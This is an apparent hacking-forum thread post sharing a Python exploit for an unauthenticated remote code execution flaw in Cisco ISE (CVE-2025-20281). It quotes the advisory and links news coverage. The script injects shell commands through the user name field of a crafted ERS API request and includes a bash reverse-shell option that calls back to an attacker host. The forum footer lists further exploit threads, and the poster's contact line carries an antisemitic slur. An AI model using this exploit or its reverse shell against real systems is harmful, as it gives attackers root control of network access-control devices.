JOIN BREACHFORUMS TELEGRAM
Cisco ISE - Unauthenticated RCE
by antisocial - Saturday July 26, 2025 at 08:21 AM
Anti-Social Personality Disorder
God
Posts: 88
Threads: 23
Joined: Jul 2024
Reputation: 724

CoderHackerGOD
#1
Jul 26, 2025, 08:21 AM
Thought i would share this since its really not that talked about but still pretty interesting, if you have anything you want to add please do so : )

Vulnerability description:
"A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device."

Articles:
https://thehackernews.com/2025/07/critic...ified.html
https://www.theregister.com/2025/06/26/p...fixes_two/
https://www.securityweek.com/critical-ci...execution/
https://www.bleepingcomputer.com/news/se...es-engine/
https://thehackernews.com/2025/06/critic...d-ise.html
https://securityaffairs.com/179362/secur...l-rce.html
[*]
#!/usr/bin/env python3
import requests
import urllib3
import argparse
urllib3.disable_warnings()
def exploit_cve_2025_20281_unauth(target, cmd):
    url = f"https://{target}:9060/ers/sdk#_"
    #url = f"https://{target}/ers/sdk#_"
    payload = {
        "InternalUser": {
            "name": f"pwn; {cmd}; #",
            "password": "x",        # dummy, ignored by vuln
            "changePassword": False
        }
    }
    r = requests.post(url, json=payload, verify=False)
    print(f"[+] HTTP {r.status_code}\n{r.text}\n")
def build_reverse_shell(lhost, lport):
    return f"/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="Unauthenticated PoC for CVE-2025-20281 on Cisco ISE ERS"
    )
    parser.add_argument('target', help="IP or hostname of the ISE PAN")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument(
        '--whoami',
        action='store_true',
        help="Run 'whoami' and print the result"
    )
    group.add_argument(
        '--reverse',
        nargs=2,
        metavar=('LHOST', 'LPORT'),
        help="Spawn a bash reverse shell to LHOST:LPORT"
    )
    args = parser.parse_args()
    if args.whoami:
        cmd = 'whoami'
    else:
        lhost, lport = args.reverse
        cmd = build_reverse_shell(lhost, lport)
    print(f"
Target: {args.target}")
    print(f"
Command: {cmd}\n")
    exploit_cve_2025_20281_unauth(args.target, cmd)
 
PGP
PGP ARCHIVE
contact: i@hateje.ws
Reply
Breached
Member
Posts: 40
Threads: 3
Joined: Jan 2025
Reputation: 0
#2
Jul 29, 2025, 06:50 AM
check check check
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  New Zer0 Day Wordpress A3g00n 82 3,760 Yesterday, 01:14 PM
Last Post: wker
  {SECRET} DATABASE OF EXPLOITS lulagain 440 27,760 May 07, 2026, 09:44 PM
Last Post: caribou
  Dokan Pro Unauthenticated SQL Injection POC | CVSS 10 Loki 44 4,088 May 07, 2026, 04:45 PM
Last Post: Insulina
  [POC] Google OAuth "MultiLogin" endpoint 0-day Farfallaiero 108 14,165 May 06, 2026, 05:42 PM
Last Post: nobcoderfck
  Ban Any Discord Exploit phineasfisherman 7 551 May 06, 2026, 10:16 AM
Last Post: sniperx86

Forum Jump:


 Users browsing this forum: 1 Guest(s)